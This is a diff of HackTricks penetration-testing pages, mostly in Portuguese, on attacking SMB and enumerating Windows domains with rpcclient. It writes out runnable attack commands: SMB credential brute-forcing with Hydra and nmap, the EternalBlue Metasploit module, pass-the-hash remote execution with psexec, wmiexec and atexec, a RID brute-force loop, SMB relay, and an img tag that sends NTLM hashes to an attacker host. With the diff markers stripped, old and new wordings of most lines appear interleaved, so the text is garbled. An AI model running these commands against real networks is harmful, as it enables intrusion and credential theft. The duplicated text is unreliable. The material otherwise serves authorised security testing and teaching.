You can also use smbclient to connect to an SMB share and list its contents:
```bash
smbclient //<target>/share
```
## Enumerating Users
### Using enum4linux
enum4linux is a tool that can be used to enumerate users and gather information from SMB shares. You can run it with the following command:
```bash
enum4linux -a <target>
```
## Brute Forcing
### Using Hydra
Hydra is a popular tool for brute forcing SMB credentials. You can use it with the following command:
```bash
hydra -l <username> -P <passwords_file> smb://<target>
```
## Exploiting Vulnerabilities
### MS17-010 (EternalBlue)
EternalBlue is a vulnerability that affects the SMB protocol. You can exploit it using the Metasploit framework with the following module:
```bash
use exploit/windows/smb/ms17_010_eternalblue
```
```bash
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
@ -274,7 +326,7 @@ fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
```
explorer.exe (gráfico), digite `\\<ip>\` para ver os compartilhamentos não ocultos disponíveis.
explorer.exe (gráfico), digite `\\<ip>\` para ver as compartilhamentos não ocultos disponíveis.
### Montar uma pasta compartilhada
```bash
@ -300,30 +352,30 @@ smbclient //<IP>/<share>
```
Comandos:
* mask: especifica a máscara usada para filtrar os arquivos dentro do diretório (ex.: "" para todos os arquivos)
* mask: especifica a máscara usada para filtrar os arquivos dentro do diretório (por exemplo, "" para todos os arquivos)
* recurse: ativa a recursão (padrão: desativado)
* prompt: desativa a solicitação de nomes de arquivos (padrão: ativado)
* mget: copia todos os arquivos que correspondem à máscara do host para a máquina cliente
(_Informações da página de manual do smbclient_)
### Pesquisa de Pastas Compartilhadas de Domínio
### Pesquisa de Pastas Compartilhadas do Domínio
* [**Snaffler**](https://github.com/SnaffCon/Snaffler)****
* [**Snaffler**](https://github.com/SnaffCon/Snaffler)\*\*\*\*
```bash
Snaffler.exe -s -d domain.local -o snaffler.log -v data
```
* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider.
* `-M spider_plus [--share <nome_do_compartilhamento>]`
* `-M spider_plus [--share <share_name>]`
* `--pattern txt`
```bash
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
```
Especialmente interessantes nos compartilhamentos são os arquivos chamados **`Registry.xml`**, pois eles **podem conter senhas** para usuários configurados com **autologon** via Política de Grupo. Ou arquivos **`web.config`**, pois contêm credenciais.
Especialmente interessantes nos compartilhamentos são os arquivos chamados **`Registry.xml`** pois eles **podem conter senhas** para usuários configurados com **autologon** via Política de Grupo. Ou arquivos **`web.config`** pois eles contêm credenciais.
{% hint style="info" %}
O compartilhamento **SYSVOL** é **legível** por todos os usuários autenticados no domínio. Lá você pode **encontrar** muitos scripts diferentes em batch, VBScript e PowerShell.\
Você deve **verificar** os **scripts** dentro dele, pois você pode **encontrar** informações sensíveis, como **senhas**.
O compartilhamento **SYSVOL** é **legível** por todos os usuários autenticados no domínio. Lá você pode **encontrar** muitos scripts diferentes em lotes, VBScript e PowerShell.\
Você deve **verificar** os **scripts** dentro dele, pois pode **encontrar** informações sensíveis como **senhas**.
{% endhint %}
## Ler Registro
@ -334,22 +386,22 @@ sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a87
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
```
## Pós-Exploração
## Pós Exploração
A **configuração padrão de** um servidor **Samba** geralmente está localizada em `/etc/samba/smb.conf` e pode ter algumas **configurações perigosas**:
A configuração padrão de um servidor **Samba** geralmente está localizada em `/etc/samba/smb.conf` e pode conter algumas configurações **perigosas**:
| **Configuração** | **Descrição** |
| --------------------------- | ------------------------------------------------------------------- |
| `browseable = yes` | Permitir a listagem de compartilhamentos disponíveis no compartilhamento atual? |
| `browseable = yes` | Permitir listar compartilhamentos disponíveis no compartilhamento atual? |
| `read only = no` | Proibir a criação e modificação de arquivos? |
| `writable = yes` | Permitir que os usuários criem e modifiquem arquivos? |
| `guest ok = yes` | Permitir a conexão com o serviço sem usar uma senha? |
| `enable privileges = yes` | Honrar privilégios atribuídos a um SID específico? |
| `writable = yes` | Permitir que usuários criem e modifiquem arquivos? |
| `guest ok = yes` | Permitir conexão ao serviço sem usar uma senha? |
| `enable privileges = yes` | Respeitar privilégios atribuídos a SID específicos? |
| `create mask = 0777` | Quais permissões devem ser atribuídas aos arquivos recém-criados? |
| `directory mask = 0777` | Quais permissões devem ser atribuídas aos diretórios recém-criados? |
| `logon script = script.sh` | Qual script precisa ser executado no login do usuário? |
| `magic script = script.sh` | Qual script deve ser executado quando o script for fechado? |
| `magic output = script.out` | Onde a saída do script mágico precisa ser armazenada? |
| `logon script = script.sh` | Qual script deve ser executado no login do usuário? |
| `magic script = script.sh` | Qual script deve ser executado quando o script é fechado? |
| `magic output = script.out` | Onde a saída do script mágico deve ser armazenada? |
O comando `smbstatus` fornece informações sobre o **servidor** e sobre **quem está conectado**.
@ -364,7 +416,7 @@ rpcclient -k ws01win10.domain.com
### **crackmapexec**
crackmapexec pode executar comandos **abusando** de qualquer um dos métodos **mmcexec, smbexec, atexec, wmiexec**, sendo **wmiexec** o método **padrão**. Você pode indicar qual opção prefere usar com o parâmetro `--exec-method`:
O crackmapexec pode executar comandos **abusando** de qualquer um dos **mmcexec, smbexec, atexec, wmiexec** sendo **wmiexec** o método **padrão**. Você pode indicar qual opção prefere usar com o parâmetro `--exec-method`:
```bash
apt-get install crackmapexec
@ -388,9 +440,9 @@ crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
```
### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md)
Ambas as opções irão **criar um novo serviço** (usando _\pipe\svcctl_ via SMB) na máquina vítima e usá-lo para **executar algo** (**psexec** irá **fazer upload** de um arquivo executável para o compartilhamento ADMIN$ e **smbexec** irá apontar para **cmd.exe/powershell.exe** e colocar nos argumentos o payload --**técnica sem arquivo-**-).\
Ambas as opções irão **criar um novo serviço** (usando _\pipe\svcctl_ via SMB) na máquina vítima e usá-lo para **executar algo** (**psexec** irá **fazer upload** de um arquivo executável para a pasta ADMIN$ e **smbexec** irá apontar para **cmd.exe/powershell.exe** e colocar nos argumentos o payload --**técnica sem arquivo-**-).\
**Mais informações** sobre [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md) e [**smbexec**](../windows-hardening/ntlm/smbexec.md).\
No **kali** está localizado em /usr/share/doc/python3-impacket/examples/
No **kali**, está localizado em /usr/share/doc/python3-impacket/examples/
```bash
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
@ -398,19 +450,19 @@ No **kali** está localizado em /usr/share/doc/python3-impacket/examples/
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
```
Usando o **parâmetro** `-k` você pode se autenticar contra o **kerberos** em vez de **NTLM**
Usando o **parâmetro** `-k` você pode autenticar contra o **kerberos** em vez do **NTLM**
### [wmiexec](../windows-hardening/ntlm/wmicexec.md)/dcomexec
Execute um comando de forma furtiva sem tocar no disco ou executar um novo serviço usando DCOM via **porta 135.**\
No **kali**, está localizado em /usr/share/doc/python3-impacket/examples/
Execute furtivamente um shell de comando sem tocar no disco ou executar um novo serviço usando DCOM via **porta 135.**\
No **kali** está localizado em /usr/share/doc/python3-impacket/examples/
```bash
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
```
Utilizando o **parâmetro**`-k` você pode se autenticar através do **kerberos** em vez de **NTLM**
Usando o **parâmetro** `-k`, você pode autenticar-se contra o **kerberos** em vez do **NTLM**.
```bash
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
@ -419,8 +471,8 @@ Utilizando o **parâmetro**`-k` você pode se autenticar através do **kerberos*
```
### [AtExec](../windows-hardening/ntlm/atexec.md)
Executa comandos via Agendador de Tarefas (usando _\pipe\atsvc_ via SMB).\
No **kali**, está localizado em /usr/share/doc/python3-impacket/examples/
Executar comandos via o Agendador de Tarefas (usando _\pipe\atsvc_ via SMB).\
No **kali** está localizado em /usr/share/doc/python3-impacket/examples/
```bash
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
@ -429,21 +481,21 @@ No **kali**, está localizado em /usr/share/doc/python3-impacket/examples/
[https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)
## **Bruteforce de credenciais de usuários**
## **Forçar credenciais de usuários**
**Isso não é recomendado, você poderia bloquear uma conta se exceder o número máximo de tentativas permitidas**
**Isso não é recomendado, você pode bloquear uma conta se exceder o número máximo de tentativas permitidas**
```bash
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
```
## Ataque de retransmissão SMB
Este ataque utiliza o kit de ferramentas Responder para **capturar sessões de autenticação SMB** em uma rede interna e **retransmiti-las** para uma **máquina alvo**. Se a **sessão de autenticação for bem-sucedida**, você será automaticamente levado para um **shell do sistema**.\
Este ataque utiliza a ferramenta Responder para **capturar sessões de autenticação SMB** em uma rede interna e **retransmiti-las** para uma **máquina alvo**. Se a **sessão de autenticação for bem-sucedida**, você será automaticamente direcionado para um **shell do sistema**.\
[**Mais informações sobre este ataque aqui.**](../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
## SMB-Trap
A biblioteca do Windows URLMon.dll tenta automaticamente se autenticar ao host quando uma página tenta acessar algum conteúdo via SMB, por exemplo: `img src="\\10.10.10.10\path\image.jpg"`
A biblioteca do Windows URLMon.dll tenta automaticamente autenticar-se no host quando uma página tenta acessar algum conteúdo via SMB, por exemplo: `img src="\\10.10.10.10\path\image.jpg"`
Isso ocorre com as funções:
@ -452,7 +504,7 @@ Isso ocorre com as funções:
* URLOpenStream
* URLOpenBlockingStream
Que são utilizadas por alguns navegadores e ferramentas (como o Skype)
Que são usadas por alguns navegadores e ferramentas (como o Skype)
![De: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../.gitbook/assets/image (93).png>)
@ -462,11 +514,11 @@ Que são utilizadas por alguns navegadores e ferramentas (como o Skype)
## Roubo de NTLM
Semelhante ao SMB Trap, plantar arquivos maliciosos em um sistema alvo (via SMB, por exemplo) pode provocar uma tentativa de autenticação SMB, permitindo que o hash NetNTLMv2 seja interceptado com uma ferramenta como o Responder. O hash pode então ser quebrado offline ou usado em um [ataque de retransmissão SMB](pentesting-smb.md#smb-relay-attack).
Similar ao SMB Trapping, ao implantar arquivos maliciosos em um sistema alvo (via SMB, por exemplo), pode-se provocar uma tentativa de autenticação SMB, permitindo que o hash NetNTLMv2 seja interceptado com uma ferramenta como o Responder. O hash pode então ser quebrado offline ou usado em um [ataque de retransmissão SMB](pentesting-smb.md#smb-relay-attack).
[Veja: ntlm\_theft](../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm\_theft)
## Comandos Automáticos HackTricks
## Comandos Automáticos do HackTricks
```
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
@ -537,14 +589,14 @@ Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP
```
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>

110
network-services-pentesting/pentesting-smb/rpcclient-enumeration.md
View file

@ -4,17 +4,17 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me no** **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [repositório hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
</details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Encontre vulnerabilidades que são mais importantes para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha de tecnologia, desde APIs até aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
Encontre vulnerabilidades que são mais importantes para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -22,91 +22,89 @@ Encontre vulnerabilidades que são mais importantes para que você possa corrigi
### **O que é um RID**
Um [Identificador Relativo (RID)](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-identifiers) é um **identificador único** (representado em formato hexadecimal) utilizado pelo Windows para **rastrear e identificar objetos**. Para explicar como isso se encaixa, vamos olhar para os exemplos abaixo:
Um [Identificador Relativo (RID)](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-identifiers) é um **identificador único** (representado em formato hexadecimal) utilizado pelo Windows para **rastrear e identificar objetos**. Para explicar como isso se encaixa, vamos ver os exemplos abaixo:
* O [SID](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-identifiers) para o domínio NAME\_DOMAIN.LOCAL é: `S-1-5-21-1038751438-1834703946-36937684957`.
* Quando um objeto é criado dentro de um domínio, o número acima (SID) será combinado com um RID para criar um valor único usado para representar o objeto.
* Portanto, o usuário do domínio `john` com um RID:\[0x457] Hex 0x457 seria = decimal `1111`, terá um SID de usuário completo: `S-1-5-21-1038751438-1834703946-36937684957-1111`.
* Isso é único para o objeto `john` no domínio NAME\_DOMAIN.LOCAL e você nunca verá esse valor emparelhado ligado a outro objeto neste domínio ou em qualquer outro.
* Assim, o usuário do domínio `john` com um RID:\[0x457] Hex 0x457 seria igual a decimal `1111`, terá um SID de usuário completo: `S-1-5-21-1038751438-1834703946-36937684957-1111`.
* Isso é único para o objeto `john` no domínio NAME\_DOMAIN.LOCAL e você nunca verá esse valor emparelhado atrelado a outro objeto neste domínio ou em qualquer outro.
Definição da [**qui**](https://academy.hackthebox.com/module/143/section/1269).
### **Enumeração com rpcclient**
**Parte desta seção foi extraída do livro "**_**Network Security Assesment 3rd Edition**_**"**
A utilidade **`rpcclient`** do Samba é utilizada para interagir com **pontos finais RPC por meio de pipes nomeados**. Abaixo estão os comandos que podem ser emitidos para as interfaces SAMR, LSARPC e LSARPC-DS após uma **sessão SMB ser estabelecida**, muitas vezes exigindo credenciais.
Você pode usar a utilidade **`rpcclient`** do Samba para interagir com **pontos de extremidade RPC via named pipes**. A seguir estão listados comandos que você pode emitir para as interfaces SAMR, LSARPC e LSARPC-DS ao **estabelecer** uma **sessão SMB** (geralmente exigindo credenciais).
#### Informações do Servidor
#### Informações do servidor
* Para obter as **Informações do Servidor**: é usado o comando `srvinfo`.
* **Informações do servidor**: `srvinfo`
#### Enumeração de Usuários
#### Enumeração de usuários
* **Listar usuários**: `querydispinfo` e `enumdomusers`
* **Obter detalhes do usuário**: `queryuser <0xrid>`
* **Obter grupos do usuário**: `queryusergroups <0xrid>`
* **Obter SID de um usuário**: `lookupnames <username>`
* **Obter aliases de usuários**: `queryuseraliases [builtin|domain] <sid>`
* Os **usuários podem ser listados** usando: `querydispinfo` e `enumdomusers`.
* **Detalhes de um usuário** por: `queryuser <0xrid>`.
* **Grupos de um usuário** com: `queryusergroups <0xrid>`.
* **O SID de um usuário é recuperado** através de: `lookupnames <username>`.
* **Aliases de usuários** por: `queryuseraliases [builtin|domain] <sid>`.
```bash
# Brute-Force users RIDs
# Users' RIDs-forced
for i in $(seq 500 1100); do
rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";
rpcclient -N -U "" [IP_ADDRESS] -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";
done
# You can also use samrdump.py for this purpose
# samrdump.py can also serve this purpose
```
#### Enumeração de Grupos
* **Listar grupos**: `enumdomgroups`
* **Obter detalhes do grupo**: `querygroup <0xrid>`
* **Obter membros do grupo**: `querygroupmem <0xrid>`
* **Grupos** por: `enumdomgroups`.
* **Detalhes de um grupo** com: `querygroup <0xrid>`.
* **Membros de um grupo** através de: `querygroupmem <0xrid>`.
#### Enumeração de Grupos de Alias
* **Listar alias**: `enumalsgroups <builtin|domain>`
* **Obter membros**: `queryaliasmem builtin|domain <0xrid>`
* **Grupos de alias** por: `enumalsgroups <builtin|domain>`.
* **Membros de um grupo de alias** com: `queryaliasmem builtin|domain <0xrid>`.
#### Enumeração de Domínios
* **Listar domínios**: `enumdomains`
* **Obter SID**: `lsaquery`
* **Informações do domínio**: `querydominfo`
* **Domínios** usando: `enumdomains`.
* **O SID de um domínio é recuperado** através de: `lsaquery`.
* **Informações do domínio são obtidas** por: `querydominfo`.
#### Enumeração de Compartilhamentos
* **Enumerar todos os compartilhamentos disponíveis**: `netshareenumall`
* **Informações sobre um compartilhamento**: `netsharegetinfo <share>`
* **Todos os compartilhamentos disponíveis** por: `netshareenumall`.
* **Informações sobre um compartilhamento específico são obtidas** com: `netsharegetinfo <share>`.
#### Mais SIDs
#### Operações Adicionais com SIDs
* **Encontrar SIDs pelo nome**: `lookupnames <username>`
* **Encontrar mais SIDs**: `lsaenumsid`
* **Ciclagem de RID (verificar mais SIDs)**: `lookupsids <sid>`
* **SIDs por nome** usando: `lookupnames <username>`.
* **Mais SIDs** através de: `lsaenumsid`.
* **Ciclagem de RID para verificar mais SIDs** é realizada por: `lookupsids <sid>`.
#### **Comandos extras**
#### **Comandos Extras**
| **Comando** | **Interface** | **Descrição** |
| -------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------- |
| queryuser | SAMR | Recuperar informações do usuário |
| querygroup | Recuperar informações do grupo | |
| querydominfo | Recuperar informações do domínio | |
| enumdomusers | Enumerar usuários do domínio | |
| enumdomgroups | Enumerar grupos do domínio | |
| createdomuser | Criar um usuário do domínio | |
| deletedomuser | Excluir um usuário do domínio | |
| lookupnames | LSARPC | Pesquisar nomes de usuário para valores SID[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn8) |
| lookupsids | Pesquisar SIDs para nomes de usuário (ciclagem de RID[b](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn9)) | |
| lsaaddacctrights | Adicionar direitos a uma conta de usuário | |
| lsaremoveacctrights | Remover direitos de uma conta de usuário | |
| dsroledominfo | LSARPC-DS | Obter informações do domínio primário |
| dsenumdomtrusts | Enumerar domínios confiáveis dentro de uma floresta AD | |
| **Comando** | **Interface** | **Descrição** |
| ------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------- |
| queryuser | SAMR | Recuperar informações do usuário |
| querygroup | Recuperar informações do grupo | |
| querydominfo | Recuperar informações do domínio | |
| enumdomusers | Enumerar usuários do domínio | |
| enumdomgroups | Enumerar grupos do domínio | |
| createdomuser | Criar um usuário de domínio | |
| deletedomuser | Excluir um usuário de domínio | |
| lookupnames | LSARPC | Pesquisar nomes de usuário para valores SID[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn8) |
| lookupsids | Pesquisar SIDs para nomes de usuário (ciclagem de RID[b](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn9)) | |
| lsaaddacctrights | Adicionar direitos a uma conta de usuário | |
| lsaremoveacctrights | Remover direitos de uma conta de usuário | |
| dsroledominfo | LSARPC-DS | Obter informações do domínio primário |
| dsenumdomtrusts | Enumerar domínios confiáveis dentro de um floresta AD | |
Para **entender** melhor como as ferramentas _**samrdump**_ **e** _**rpcdump**_ funcionam, você deve ler [**Pentesting MSRPC**](../135-pentesting-msrpc.md).
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Encontre vulnerabilidades que são mais importantes para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha de tecnologia, desde APIs até aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
Encontre vulnerabilidades que mais importam para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -115,10 +113,10 @@ Encontre vulnerabilidades que são mais importantes para que você possa corrigi
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me no** **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [repositório hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
</details>

282
network-services-pentesting/pentesting-smtp/README.md
View file

@ -2,29 +2,29 @@
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
